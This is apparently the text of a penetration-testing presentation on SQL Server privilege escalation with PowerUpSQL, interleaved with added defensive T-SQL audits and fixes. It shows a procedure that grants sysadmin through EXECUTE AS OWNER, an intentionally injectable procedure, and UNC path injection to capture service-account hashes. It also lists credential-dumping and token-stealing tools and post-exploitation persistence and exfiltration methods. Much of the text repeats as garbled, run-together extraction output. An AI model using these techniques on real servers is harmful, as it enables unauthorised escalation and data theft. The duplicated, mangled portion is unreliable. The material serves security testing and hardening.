Presentation Overview
• Why SQL Server and PowerShell
• PowerUpSQL Overview
• Finding & Accessing SQL Servers
• Privilege Escalation Scenarios
  o Domain user to SQL Server login
  o SQL Server login to sysadmin
  o Sysadmin to Windows admin
  o Windows admin to sysadmin
  o Domain escalation
• Post Exploitation Activities
• General Recommendations
Why SQL Server?
• Used in most enterprise environments
• Supports local Windows and Domain authentication
• Integrates with lots of Windows applications
• Generally has trust relationships that others don’t
Why PowerShell?
• Native to Windows
• Run commands in memory
• Run managed .NET code
• Run unmanaged code
• Avoid detection by legacy anti-virus
• Already flagged as trusted by most application whitelist solutions
• A medium used to write many open source pentest toolkits

PowerUpSQL Overview
• Scalability via runspace threading
• Flexibility via pipeline support, PS objects and data tables
• Portability
  o No SMO dependencies
  o .NET Framework libraries
  o PowerShell v2 compliant (in theory)
  o Single file
Functional Goals
• Discover SQL Servers from different attacker perspectives
• Inventory SQL Servers quickly
• Audit SQL Servers for common insecure configurations
• Escalate privileges quickly on SQL Servers
• Support authentication using SQL Login or Windows Credential
Find SQL Servers
Attacker Perspective | Discovery Technique
Unauthenticated      | List from file, TCP port scan, UDP port scan, UDP broadcast, Azure DNS dictionary attack (x.database.windows.net), Azure DNS lookup via public resources
Local User           | Services, Registry entries
Domain User          | Service Principal Names, Azure Portal PowerShell modules

Find SQL Servers: PowerUpSQL
Attacker Perspective | PowerUpSQL Function
Unauthenticated      | Get-SQLInstanceFile
Unauthenticated      | Get-SQLInstanceUDPScan
Local User           | Get-SQLInstanceLocal
Domain User          | Get-SQLInstanceDomain
Blog: https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/
Escalating Privileges: Unauthenticated / Domain User to SQL Login
Testing Login Access: Techniques
What credentials can I use to log into discovered SQL Servers?
Attacker Perspective                | Attack Technique
Unauthenticated                     | Dictionary attacks using common user names and passwords
Unauthenticated                     | Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account | Attempt to log in using the current account

Testing Login Access: PowerUpSQL CMDs
What PowerUpSQL functions can I use to test for successful logins?
Attack Technique      | PowerUpSQL Function
Dictionary Attack     | Invoke-SQLAuditWeakLoginPw
Default Password Test | Invoke-SQLAuditDefaultLoginPw
2. Get the principal id for the sa account with "suser_id"
3. Use "suser_name" to get SQL logins using just the principal id
4. Increment the number and repeat

    -- Enumerate server principals by walking principal ids 1..10000 (the
    -- spt_values cross join is only a cheap way to generate the numbers).
    select n [id], SUSER_NAME(n) [user_name]
    from (select top 10000 row_number() over(order by t1.number) as N
          from master..spt_values t1 cross join master..spt_values t2) a
    where SUSER_NAME(n) is not null

Code gifted from mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges: Weak Passwords
3. Grab the first 48 bytes of the full RID
   RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
   SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
Cons
• No granular control over the database owner’s privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions

    USE MyAppDb
    GO
    -- Runs in the database owner's context; if the owner is a sysadmin,
    -- any db_owner member who can create this procedure becomes sysadmin.
    CREATE PROCEDURE sp_escalate_me
    WITH EXECUTE AS OWNER
    AS
    EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
    GO

SYSADMIN is often the OWNER
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don’t have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
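The seven steps above carried through in T-SQL, as an added example that is not code from the slides or from PowerUpSQL. It assumes a database MyAppDb, an application user MyAppUser, and that the only elevated right the procedure needs is VIEW SERVER STATE; the certificate and login names, the master key password and the export path are placeholders.

```sql
USE MyAppDb;
GO
-- 1. Create the stored procedure. It reads a server-scoped DMV, which needs
--    VIEW SERVER STATE; MyAppUser does not hold that right. The signature,
--    not EXECUTE AS OWNER, will supply it while the procedure runs.
CREATE PROCEDURE dbo.usp_ActiveSessions
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, login_name, host_name, program_name
    FROM   sys.dm_exec_sessions
    WHERE  is_user_process = 1;
END;
GO
-- 2. Create a database master key (protects the certificate's private key).
--    Skip if the database already has one. Placeholder password: replace.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<DMK-password-placeholder>';
GO
-- 3. Create a certificate used only for signing this module.
CREATE CERTIFICATE ActiveSessionsSigningCert
    WITH SUBJECT = 'Code signing for dbo.usp_ActiveSessions';
GO
-- 4. Create a login from the certificate. Only the public part is exported
--    (no private key) and imported into master. Placeholder path: replace.
BACKUP CERTIFICATE ActiveSessionsSigningCert
    TO FILE = 'C:\SqlCerts\ActiveSessionsSigningCert.cer';
GO
USE master;
GO
CREATE CERTIFICATE ActiveSessionsSigningCert
    FROM FILE = 'C:\SqlCerts\ActiveSessionsSigningCert.cer';
GO
CREATE LOGIN ActiveSessionsSigningLogin
    FROM CERTIFICATE ActiveSessionsSigningCert;
GO
-- 5. Configure login privileges: exactly the one right the procedure needs.
--    A certificate-mapped login cannot be used to connect, so no new account
--    with a password is introduced.
GRANT VIEW SERVER STATE TO ActiveSessionsSigningLogin;
GO
-- 6. Sign the stored procedure with the certificate (private key is in MyAppDb).
--    Any later ALTER PROCEDURE drops the signature, so modified code loses the right.
USE MyAppDb;
GO
ADD SIGNATURE TO dbo.usp_ActiveSessions BY CERTIFICATE ActiveSessionsSigningCert;
GO
-- 7. GRANT EXECUTE to the application user.
GRANT EXECUTE ON dbo.usp_ActiveSessions TO MyAppUser;
GO
-- Check as the application login: the procedure works, the DMV directly does not.
EXECUTE AS LOGIN = 'MyAppUser';
EXEC dbo.usp_ActiveSessions;      -- succeeds: signature adds VIEW SERVER STATE
-- SELECT TOP (1) session_id FROM sys.dm_exec_sessions;  -- would fail with error 300
REVERT;
```

Compared with the EXECUTE AS OWNER procedure on the previous slide, the caller gains precisely VIEW SERVER STATE and nothing else, the database stays non-trustworthy, and because a signature is invalidated by any change to the module text, an injected change to the procedure body cannot carry the elevated right with it.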
Escalating Privileges: Impersonation
SQL Injection Example

    -- Deliberately injectable: @DbName is concatenated into the statement text.
    CREATE PROCEDURE sp_sqli2
    @DbName varchar(max)
    AS
    BEGIN
    Declare @query as varchar(max)
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''
    EXECUTE(@query)
    END
    GO
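The same lookup written so the caller's value is bound as a parameter, followed by an audit that finds modules which both run under an elevated context and build dynamic SQL. This is an added example, not code from the slides or from PowerUpSQL; the WITH EXECUTE AS OWNER clause is added here to show that the elevated context is harmless once the statement text cannot be altered.

```sql
-- Added example (not from the slides): parameterised version of sp_sqli2.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName varchar(max)
WITH EXECUTE AS OWNER
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master.sys.databases
          WHERE name LIKE ''%'' + @pattern + ''%'' OR name = ''tempdb''';
    -- @pattern is typed and passed separately; its contents never become code.
    EXEC sys.sp_executesql @query, N'@pattern nvarchar(max)', @pattern = @DbName;
END;
GO
-- Constructed inputs: a normal value, then an injection attempt. The second is
-- used as a literal LIKE pattern, matches nothing, and returns only tempdb.
EXEC dbo.sp_sqli2_fixed @DbName = 'master';
EXEC dbo.sp_sqli2_fixed @DbName = 'x'' OR 1=1 --';
GO
-- Audit (current database): modules with an EXECUTE AS clause
-- (execute_as_principal_id set; -2 means OWNER) that also contain dynamic SQL.
-- The LIKE filters are deliberately coarse; every hit gets a manual review.
SELECT  DB_NAME()                                                     AS database_name,
        OBJECT_SCHEMA_NAME(m.object_id) + '.' + OBJECT_NAME(m.object_id) AS module_name,
        CASE m.execute_as_principal_id
             WHEN -2 THEN 'OWNER'
             ELSE USER_NAME(m.execute_as_principal_id) END            AS executes_as,
        CASE WHEN m.definition LIKE '%sp_executesql%'
             THEN 'sp_executesql (check that values are parameters)'
             ELSE 'EXEC(string) (check for concatenation)' END        AS dynamic_sql_style
FROM    sys.sql_modules AS m
WHERE   m.execute_as_principal_id IS NOT NULL
  AND  (m.definition LIKE '%EXEC%(%' OR m.definition LIKE '%sp_executesql%');
```

In sp_sqli2 the input `x' OR 1=1 --` becomes part of the statement and, combined with an EXECUTE AS clause, lets the caller run arbitrary statements as the impersonated principal; in sp_sqli2_fixed the same string is only ever a pattern value.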
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server you have it on all of them
One account to rule them all
Diagram: Leveraging Shared MS SQL Server Service Accounts. Zones: Internet, DMZ and Intranet (ADS); LVA and HVA database servers; ports 80 and 443 into the DMZ, ports 1433 and 1434 into the intranet. Steps shown: 1 SQL injection against the LVA; 2 execute local command via xp_cmdshell; 3 execute commands and gather data from other database servers via osql, i.e. access to the HVA with the shared domain service account. Key: HVA = High Value Application, LVA = Low Value Application.
Escalating Privileges: Crawling Server Links
What’s a database link?
• Database links are basically persistent database connections for SQL Servers
Why should I care?
• Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)

    SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')

• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
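Whether a link is a privilege escalation path depends on the login mapping behind it, which is visible in the catalog. The inventory and remediation below are an added example, not code from the slides or from PowerUpSQL; SQLSERVER2, AppLogin and LinkReader are assumed names.

```sql
-- Added example (not from the slides). The slide's query, extended to show
-- which remote login actually answers: that is the identity every caller
-- inherits through the link's default mapping.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT SUSER_SNAME() AS remote_login, @@VERSION AS remote_version');

-- Inventory links and their login mappings. local_principal_id = 0 is the
-- default mapping applied to every login without an explicit entry, i.e. to
-- public. remote_name = 'sa' (or another sysadmin) with uses_self_credential = 0
-- is the "DB link with SA account" case from the diagrams.
SELECT  s.name                        AS linked_server,
        s.data_source,
        s.is_rpc_out_enabled,         -- required for EXEC ... AT server
        s.is_data_access_enabled,     -- required for OPENQUERY
        COALESCE(sp.name, '<default for all logins>') AS local_login,
        ll.uses_self_credential,
        ll.remote_name
FROM    sys.servers                 AS s
JOIN    sys.linked_logins           AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals     AS sp ON sp.principal_id = ll.local_principal_id
WHERE   s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;

-- Remediation pattern: drop the catch-all mapping, map only the logins that need
-- the link, and map them to a low-privileged remote login. Placeholder password.
EXEC sys.sp_droplinkedsrvlogin @rmtsrvname = N'SQLSERVER2', @locallogin = NULL;
EXEC sys.sp_addlinkedsrvlogin  @rmtsrvname = N'SQLSERVER2', @useself = N'false',
                               @locallogin = N'AppLogin',
                               @rmtuser    = N'LinkReader',
                               @rmtpassword = N'<placeholder>';
-- Disable remote procedure execution over the link unless it is genuinely needed.
EXEC sys.sp_serveroption @server = N'SQLSERVER2', @optname = N'rpc out', @optvalue = N'false';
```

Crawling stops being useful once each hop maps to a remote login that can only read what the application needs: a public-role caller on the first server then arrives at the next server as LinkReader, not as sa, and with rpc out disabled cannot call stored procedures there at all.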
Diagram: Leveraging MS SQL Database links. Same zones (Internet, DMZ, Intranet/ADS) and ports (80 and 443 into the DMZ, 1433 and 1434 into the intranet). Steps shown: 1 SQL injection against the LVA (DB1); 2 execute SQL queries and local commands on database servers via nested linked services, where the chain of links includes one configured with least privileges and one configured with the SA account, ending at the HVA. Key: HVA = High Value Application, LVA = Low Value Application.
Escalating Privileges: Crawling Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we’ve seen

Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts

Escalating Privileges: UNC Path Injection
Oh yeah…
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
• xp_dirtree
• xp_fileexists
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
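The default grant that makes this work is an ordinary object permission in master and can be listed and revoked like any other. The check and hardening below are an added example, not code from the slides or from PowerUpSQL.

```sql
USE master;
GO
-- Added example (not from the slides): who may execute the two file-path
-- procedures named on the slide. public is principal_id 0 in every database;
-- a row for it means every login on the instance, including every domain user
-- reaching the instance through a Windows group, can call the procedure.
SELECT  OBJECT_NAME(p.major_id)  AS procedure_name,
        pr.name                  AS grantee,
        p.permission_name,
        p.state_desc
FROM    sys.database_permissions AS p
JOIN    sys.database_principals  AS pr ON pr.principal_id = p.grantee_principal_id
WHERE   p.class = 1                          -- object-level permission
  AND   p.major_id IN (OBJECT_ID('sys.xp_dirtree'), OBJECT_ID('sys.xp_fileexists'));

-- Hardening: remove the default grant. Check first that tooling used by
-- non-sysadmins has another path (SSMS browse dialogs call xp_dirtree).
REVOKE EXECUTE ON sys.xp_dirtree    FROM public;
REVOKE EXECUTE ON sys.xp_fileexists FROM public;

-- Re-run the first query: no public row should remain for either procedure.
-- This closes only these two entry points. Other statements that take a path
-- (BULK INSERT, BACKUP, RESTORE) are governed by their own permissions, and
-- SMB signing plus filtering of outbound SMB from database hosts limit what a
-- captured NetNTLM hash can be relayed to.
```

Because the procedures live in master, the permission rows are in master's sys.database_permissions even though the caller may be connected to another database; the query therefore has to run in master.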
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It’s self descriptive

Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Below are some options for leveraging that knowledge

Approach             2000  2005  2008  2012  2014  2016
LSA Secrets           x     x     x     x     x     x
Local Administrator   x     x
LocalSystem           x     x     x
Process Migration     x     x     x     x     x     x
Token Stealing        x     x     x     x     x     x
Single User Mode            x     x     x     x     x
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options

Approach                                                     | Common Tools
Access as Local Administrator                                | Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                        | Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets | Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process  | Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process   | Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                             | DBATools
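The shared-service-account slide and the two OS-admin tables both come down to who holds sysadmin on the instance and under which Windows account it runs. The audit below answers both from the catalog and is an added example, not code from the slides or from PowerUpSQL.

```sql
-- Added example (not from the slides).
-- 1. Which account runs each service? sys.dm_server_services is available from
--    SQL Server 2008 R2 SP1. A DOMAIN\name account that recurs on many hosts is
--    the "one account to rule them all" pattern; a virtual or managed account
--    is not reusable across servers in the same way.
SELECT  servicename,
        service_account,
        CASE WHEN service_account LIKE 'NT Service\%'
               OR service_account LIKE 'NT AUTHORITY\%'
             THEN 'built-in or virtual account'
             WHEN service_account LIKE '%$'
             THEN 'managed service account'
             ELSE 'domain or local user account: check for reuse on other servers'
        END AS account_kind
FROM    sys.dm_server_services;

-- 2. Every sysadmin member, with the principals from the version matrix flagged.
--    BUILTIN\Administrators and NT AUTHORITY\SYSTEM were sysadmin by default on
--    the older versions in the table; the per-service SID is sysadmin on all.
SELECT  m.name,
        m.type_desc,
        m.is_disabled,
        CASE WHEN m.name = 'BUILTIN\Administrators' THEN 'every local admin is sysadmin'
             WHEN m.name = 'NT AUTHORITY\SYSTEM'     THEN 'LocalSystem is sysadmin'
             WHEN m.name LIKE 'NT SERVICE\MSSQL%'   THEN 'per-service SID (expected)'
             ELSE '' END AS note
FROM    sys.server_role_members AS rm
JOIN    sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE   r.name = 'sysadmin'
  AND   m.type IN ('S', 'U', 'G')   -- SQL logins, Windows logins, Windows groups
ORDER BY m.type_desc, m.name;

-- Remediation for the default Windows grants where they are still present:
-- ALTER SERVER ROLE sysadmin DROP MEMBER [BUILTIN\Administrators];   -- 2012 and later
-- EXEC sp_dropsrvrolemember 'BUILTIN\Administrators', 'sysadmin';    -- older versions
```

Removing BUILTIN\Administrators and NT AUTHORITY\SYSTEM from sysadmin closes the "Access as Local Administrator" and "Access as LocalSystem" rows of the matrix; the LSA Secrets, process and token rows remain, because they rest on the service account itself, which is why a unique (ideally managed) service account per instance matters more than any single grant.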
Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
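The "regular expressions and the Luhn formula against data samples" step is the same technique a data-classification pass uses to find where card numbers are stored so they can be protected. A T-SQL Luhn check over a constructed sample table, as an added example that is not code from the slides or from PowerUpSQL (the test numbers are the publicly documented card-brand test values, not real PANs):

```sql
-- Added example (not from the slides): Luhn checksum as a scalar function.
CREATE FUNCTION dbo.fn_LuhnValid (@input varchar(64))
RETURNS bit
AS
BEGIN
    -- Accept the usual separators, then require a pure digit string.
    DECLARE @digits varchar(64) = REPLACE(REPLACE(@input, ' ', ''), '-', '');
    IF @digits LIKE '%[^0-9]%' RETURN 0;
    -- Payment card numbers are 13 to 19 digits; anything else is not a candidate.
    IF LEN(@digits) < 13 OR LEN(@digits) > 19 RETURN 0;
    -- Walk from the rightmost digit; double every second digit, subtract 9 if > 9.
    DECLARE @sum int = 0, @pos int = LEN(@digits), @dbl int = 0, @d int;
    WHILE @pos >= 1
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS int);
        IF @dbl = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d = @d - 9;
        END;
        SET @sum = @sum + @d;
        SET @dbl = 1 - @dbl;
        SET @pos = @pos - 1;
    END;
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END;
GO
-- Constructed sample rows standing in for a column under review.
DECLARE @sample TABLE (id int, val varchar(64));
INSERT INTO @sample VALUES
    (1, '4111 1111 1111 1111'),   -- Visa test number: Luhn valid
    (2, '4111111111111112'),      -- last digit changed: Luhn invalid
    (3, '378282246310005'),       -- Amex test number: Luhn valid
    (4, '555-0100'),              -- too short, never a candidate
    (5, 'hello world');           -- not numeric
-- Cheap pattern pre-filter first, checksum only on the survivors.
SELECT id, val, dbo.fn_LuhnValid(val) AS luhn_ok
FROM   @sample
WHERE  val LIKE '%[0-9][0-9][0-9][0-9]%';
-- Rows 1 and 3 return luhn_ok = 1; row 2 returns 0; rows 4 and 5 are filtered out
-- (row 4 by the length check would also be 0). A column where most sampled rows
-- pass the checksum is a strong candidate for holding card data.
```

The pre-filter matters for the same reason an attacker cares about "large databases": a scalar function per row over a wide table is slow, so the LIKE pattern narrows the rows and the function decides only among plausible candidates.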
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Testing Login Access: Techniques
What credentials can I use to log into discovered SQL Servers?

Attacker Perspective                   Attack Technique
Unauthenticated                        Dictionary attacks using common user names and passwords
Unauthenticated                        Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account    Attempt to login using the current account

Testing Login Access: PowerUpSQL CMDs
What PowerUpSQL functions can I use to test for successful logins?

Attack Technique         PowerUpSQL Function
Dictionary Attack        Invoke-SQLAuditWeakLoginPw
Default Password Test    Invoke-SQLAuditDefaultLoginPw
Escalating Privileges: Weak Passwords
2. Get the principal id for the sa account with "suser_id"
3. Use "suser_name" to get SQL logins using just the principal ID
4. Increment the number and repeat

select n [id], SUSER_NAME(n) [user_name]
from ( select top 10000 row_number() over(order by t1.number) as N
       from master..spt_values t1 cross join master..spt_values t2) a
where SUSER_NAME(n) is not null

Code gifted from mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7

3. Grab the first 48 bytes of the full RID:
   RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
   SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login

Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE

Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• DB_OWNER role can impersonate the actual database owner

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO

SYSADMIN is often the OWNER
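The check a defender would run for the condition just described, added here as an example and not taken from the deck: it lists the databases whose owner is a sysadmin or that are marked TRUSTWORTHY, the modules in one database that run WITH EXECUTE AS OWNER, and the db_owner members who could create such a module. MyAppDb is the deck's example database; LowPrivOwnerLogin is a placeholder name for this example.

```sql
-- Added defender's check (not the deck's code). Catalog views used are standard
-- SQL Server views; MyAppDb is the deck's example name, LowPrivOwnerLogin a placeholder.

-- 1. Which databases are owned by a sysadmin, and which are TRUSTWORTHY?
--    Both together are the preconditions for the sp_escalate_me pattern.
SELECT  d.name                                              AS database_name,
        SUSER_SNAME(d.owner_sid)                            AS owner_login,
        IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin,
        d.is_trustworthy_on
FROM    sys.databases AS d
WHERE   d.database_id > 4;        -- skip master, tempdb, model, msdb

-- 2. Inside a database: modules that will run in the database owner's context.
--    execute_as_principal_id = -2 is the catalog encoding of EXECUTE AS OWNER.
USE MyAppDb;
GO
SELECT  OBJECT_SCHEMA_NAME(m.object_id) AS schema_name,
        OBJECT_NAME(m.object_id)        AS module_name,
        o.type_desc
FROM    sys.sql_modules AS m
JOIN    sys.objects     AS o ON o.object_id = m.object_id
WHERE   m.execute_as_principal_id = -2;

-- 3. Who holds db_owner here (and could therefore create such a module)?
SELECT  dp.name AS member_name, dp.type_desc
FROM    sys.database_role_members AS rm
JOIN    sys.database_principals   AS r  ON r.principal_id  = rm.role_principal_id
JOIN    sys.database_principals   AS dp ON dp.principal_id = rm.member_principal_id
WHERE   r.name = 'db_owner';
GO

-- Remediation for a hit: owner becomes a login with no server roles, and the
-- database is no longer trusted to act outside itself.
ALTER AUTHORIZATION ON DATABASE::MyAppDb TO [LowPrivOwnerLogin];  -- placeholder login
ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF;
GO
```

The first query is the one to schedule across an estate: a database that is both owned by a sysadmin and TRUSTWORTHY is the exact combination the slide's procedure needs, and either half of the remediation on its own already breaks it.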
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with the certificate
  o GRANT EXECUTE to user

Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution

Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
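The seven steps above carried through end to end, as an added worked example rather than the deck's own script. The procedure, certificate, login, file path and passwords (sp_list_databases, ProcSigningCert, ProcSigningLogin, C:\temp\ProcSigningCert.cer) are placeholder names chosen for this example; MyAppDb and MyAppUser are the deck's. The certificate is created in the user database, used to sign the procedure, and its public half is copied to master so a login can be created from it.

```sql
-- Added worked example of a signed procedure (not the deck's code).
-- Placeholders: sp_list_databases, ProcSigningCert, ProcSigningLogin, the
-- file path and the password. MyAppDb / MyAppUser come from the deck.
USE MyAppDb;
GO

-- 1. Create the stored procedure. It needs a server-level right the caller
--    lacks (seeing every database name), so it is a candidate for signing.
CREATE PROCEDURE dbo.sp_list_databases
AS
BEGIN
    SET NOCOUNT ON;
    SELECT name FROM master.sys.databases;
END;
GO

-- 2. Create a database master key; it protects the certificate's private key.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'Placeholder_DMK_Password_1!';
GO

-- 3. Create the certificate that will sign the procedure.
CREATE CERTIFICATE ProcSigningCert
    WITH SUBJECT = 'Signs dbo.sp_list_databases';
GO

-- 4. Create a login from the certificate. The login is created in master from
--    the certificate's public part, so export that part first (no private key).
BACKUP CERTIFICATE ProcSigningCert TO FILE = 'C:\temp\ProcSigningCert.cer';  -- placeholder path
GO
USE master;
GO
CREATE CERTIFICATE ProcSigningCert FROM FILE = 'C:\temp\ProcSigningCert.cer';
CREATE LOGIN ProcSigningLogin FROM CERTIFICATE ProcSigningCert;   -- cannot log in; carries permissions only
GO

-- 5. Configure login privileges: only the one permission the procedure needs.
GRANT VIEW ANY DATABASE TO ProcSigningLogin;
GO

-- 6. Sign the procedure. Any later ALTER PROCEDURE drops the signature, so
--    injected or modified code does not inherit the certificate's rights.
USE MyAppDb;
GO
ADD SIGNATURE TO dbo.sp_list_databases BY CERTIFICATE ProcSigningCert;
GO

-- 7. GRANT EXECUTE to the low-privileged user. No IMPERSONATE, no TRUSTWORTHY.
GRANT EXECUTE ON dbo.sp_list_databases TO MyAppUser;
GO
```

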